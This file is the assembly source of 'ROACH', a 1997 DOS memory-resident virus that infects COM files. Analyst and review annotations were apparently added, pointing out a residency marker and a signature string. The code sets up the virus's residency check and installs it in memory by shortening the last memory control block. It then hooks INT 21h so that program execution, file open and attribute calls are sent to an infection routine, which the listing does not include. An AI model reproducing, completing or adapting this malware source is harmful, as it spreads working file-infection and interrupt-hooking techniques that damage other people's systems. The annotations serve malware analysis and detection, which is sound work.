📄 roach.asm
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus installs itself memory-resident, below the video memory.
;Once the virus is in memory it infects only COM files. It does not
;infect command.com.
;--------------------------- S T A R T -------------------------------------
;host_start: first bytes of the carrier program as it appears in this listing.
;The opening jmp transfers control to the virus body; the two instructions
;after it are the carrier's own code, a plain DOS terminate request.
;NOTE(review): the listing shows no org directive; the code at virus_start
;treats offset 100h as the host start, which matches a COM image -- confirm.
host_start: ;start of the host file
jmp virus_start ;control goes to the virus body before any host code runs
mov ah,4ch ;host code: DOS function 4Ch (terminate process)
int 21h ;dos call
;----- This is the start of the virus code ----------------------------------
;virus_start: entry stub that runs before the host.
;  1. Stores the value 100h twice at the top of the stack by hand; one copy is
;     read back into DI below, the other stays on the stack for the final ret.
;  2. Reads the word at es:[101h], adds 103h and keeps the sum in BP. BP is then
;     used as the run-time offset of the virus body (presumably the word is the
;     displacement of the jmp at the host start -- confirm).
;  3. Copies 3 bytes from (BP + virus_len - 3) to offset 100h, i.e. the bytes
;     stored in the last three bytes of the virus body go back to the host start.
;  4. Issues INT 21h with AX=5432h; a reply of AX=0063h is taken to mean that
;     the resident copy is already installed.
;Analyst note: the AX=5432h request answered with AX=0063h is the residency
;marker implemented by new_21h further down and is usable as an infection
;indicator.
;NOTE(review): the reads through ES assume ES addresses the program's own
;segment at entry -- confirm against the load environment.
virus_start: ;start of the virus code
mov ax,sp ;load ax with stack pointer
mov si,ax ;si = current stack offset
mov ax,ss ;move stack segment to ax
mov ds,ax ;ds:si now addresses the top of the stack
mov di,100h ;di = offset treated as the host start
mov cx,2 ;two copies of 100h are stored
push_100_to_stack:
dec si,2 ;step si down to the next stack slot
mov sp,si ;keep sp in step with si
mov word ptr ds:[si],di ;store 100h in that slot
loop push_100_to_stack ;do it twice
inc di ;di = 101h, the byte after the first host byte
mov al,byte ptr es:[di] ;low byte of the word at 101h
mov ah,byte ptr es:[di+1] ;high byte of the word at 101h
add ax,103h ;ax = that word + 103h
mov bp,ax ;bp = run-time offset of the virus body, used by later code
add si,2 ;release one of the two stored slots
mov sp,si ;mov the stack pointer
mov di,word ptr ds:[si] ;di = 100h read back from the remaining slot
mov si,bp ;load si with the virus body offset
add si,virus_len ;si = end of the virus body
sub si,3 ;si = last three bytes of the body (stored host bytes)
push es
pop ds ;ds = es for the copy below
mov cx,3 ;move 3 bytes
rep movsb ;copy the stored bytes to offset 100h
mov ax,5432h ;residency query value
int 21h ;dos call
cmp ax,0063h ;0063h is the reply given by the resident handler
jne memory_resident ;no reply: go install the resident copy
;exit_virus: hands control back to the host.
;Clears AX, BX, CX, DX, DI, SI and ES, then executes a near ret. The ret takes
;its return address from the stack, where virus_start left the value 100h, so
;execution continues at the host start.
;NOTE(review): ES is set to 0 here rather than restored to its entry value.
exit_virus:
xor ax,ax ;ax = 0
mov bx,ax ;bx = 0
mov cx,ax ;cx = 0
mov dx,ax ;dx = 0
mov di,ax ;di = 0
mov si,ax ;si = 0
mov es,ax ;es = 0
ret ;near return to the address left on the stack (100h)
;----- This makes the virus go memory resident ------------------------------
;memory_resident: installs the resident copy. Steps, in the order executed:
;  1. INT 21h AH=52h returns the DOS "list of lists" in ES:BX; the word at
;     es:[bx-2] is taken as the segment of the first memory control block (MCB).
;  2. mcb1/mcb2 walk the chain (next = current segment + size word at offset 3
;     + 1) until a block whose type byte at offset 0 is 'Z'.
;  3. mcbx reduces that block's size word by virus_len/15 and computes the
;     segment that follows the shortened block; that segment receives the copy.
;  4. INT 21h AX=3521h reads the current INT 21h vector (ES:BX); it is stored at
;     BP + virus_len - 7 inside the running copy (presumably the data_start
;     dword used by the resident code -- confirm).
;  5. INT 21h AX=2521h points the INT 21h vector at DS:DX, with DS = the new
;     segment.
;  6. The body starting at BP is copied word by word to offset 0 of the new
;     segment, then control goes to exit_virus.
;Analyst notes: the size word of the last MCB is lowered, so memory totals
;derived from the MCB chain drop by that amount, and the INT 21h vector ends up
;pointing into the area above the last block. The ASCII string at the end of
;this block is a fixed marker that is usable as a static signature.
memory_resident:
mov ah,52h ;get the list of lists
int 21h ;dos call
mov ax,es:[bx-2] ;ax = segment of the first mcb
mov es,ax ;set es to first mcb block
mcb1:
cmp byte ptr es:[0],'Z' ;type byte 'Z' marks the last mcb in the chain
jne mcb2 ;not the last one: move to the next mcb
clc ;clear carry flag
jmp mcbx ;found the last mcb
mcb2:
mov ax,es ;ax = segment of the current mcb
add ax,word ptr es:[3] ;add the block size held at offset 3
inc ax ;plus one for the mcb header itself
mov es,ax ;es = segment of the next mcb
jmp short mcb1 ;and do it again
mcbx:
mov byte ptr es:[0],'Z' ;rewrite the type byte (already 'Z' on this path)
sub word ptr es:[3],virus_len/15 ;lower the block size by virus_len/15
add ax,word ptr es:[3] ;ax = mcb segment + reduced size
inc ax ;ax = segment just past the shortened block
mov es,ax ;es = segment that will hold the resident copy
push es ;save the target segment
push cs ;push the code segment
pop ds ;ds = cs
mov ax,3521h ;function 35h: get the int 21h vector into es:bx
int 21h ;dos call
mov si,bp ;si = start of the running virus body
add si,virus_len ;add the virus len to it
sub si,7 ;si = 7 bytes before the end of the body
mov word ptr ds:[si],bx ;store the old int 21h offset
mov word ptr ds:[si+2],es ;store the old int 21h segment
pop ds ;ds = target segment saved above
mov ax,2521h ;function 25h: set the int 21h vector to ds:dx
mov dx,new_21
int 21h ;dos call
push ds
pop es ;es = target segment
push cs
pop ds ;ds = cs, source of the copy
xor di,di ;destination offset 0
mov si,bp ;offset of the start of virus
mov cx,virus_len ;loop count (one word is moved per iteration)
do_load_tsr:
mov ax,word ptr ds:[si] ;load one word from the running copy
mov word ptr es:[di],ax ;store it in the target segment
add si,2 ;advance the source pointer
add di,2 ;advance the destination pointer
loop do_load_tsr
push cs ;push the code segment
pop ds ;reset ds to the original
jmp exit_virus ;return to the host through exit_virus
db '[Roach] by SliceMaster 1997' ;embedded ASCII marker string
;----- This is the code that runs in memory ---------------------------------
;exit_virus_tsr: leaves the resident handler with a far jump through the dword
;at cs:[data_start].
;NOTE(review): data_start is not defined in the visible part of the listing;
;presumably it holds the original INT 21h vector saved during installation, so
;the request continues in the real DOS handler -- confirm.
exit_virus_tsr:
jmp dword ptr cs:[data_start] ;far jump through the stored vector
;fake_dos_function: calls the handler stored at cs:[data_start] as if it had
;been reached by an INT instruction. pushf followed by a far call leaves flags,
;segment and offset on the stack, which is the frame an interrupt handler's
;iret expects, so the handler returns to the ret below.
;NOTE(review): data_start is not defined in the visible part of the listing;
;presumably the saved original INT 21h vector -- confirm.
fake_dos_function:
pushf ;save the flags
call dword ptr cs:[data_start] ;far call through the stored vector
ret ;and return
;new_21h: entry of the resident INT 21h handler.
;Answers the residency query: a request with AX=5432h returns AX=0063h straight
;away with iret. Every other request falls to check_interrupts.
;Analyst note: this request/reply pair is the value checked in virus_start and
;can be used to test whether the resident copy is present.
new_21h:
cmp ax,5432h ;is this the residency query
jne check_interrupts ;no: inspect the requested function
mov ax,0063h ;reply: resident copy present
iret ;interrupt return
;check_interrupts: selects the DOS functions the resident code acts on.
;AH is incremented before the compares, so the literals are one higher than the
;function requested: 4Ch matches function 4Bh (load and execute), 3Eh matches
;3Dh (open file) and 44h matches 43h (get/set file attributes).
;NOTE(review): presumably the increment keeps the real function numbers out of
;the compare instructions -- confirm.
;On a match control goes to go_virus_infect, which is not in the visible part
;of the listing; AH is still incremented on that path. On no match AH is
;restored and the request leaves through exit_virus_tsr.
;Analyst note: program execution, file open and attribute requests are the
;intercepted operations to watch when tracing this handler.
check_interrupts:
inc ah ;compare against function number + 1
cmp ah,4ch ;original ah = 4Bh, load and exec a program
je go_virus_infect ;matched: go to the infection routine
cmp ah,3eh ;original ah = 3Dh, open file call
je go_virus_infect ;matched: go to the infection routine
cmp ah,44h ;original ah = 43h, get/set file attributes call
je go_virus_infect ;matched: go to the infection routine
dec ah ;restore the caller's function number
jmp exit_virus_tsr ;leave through exit_virus_tsr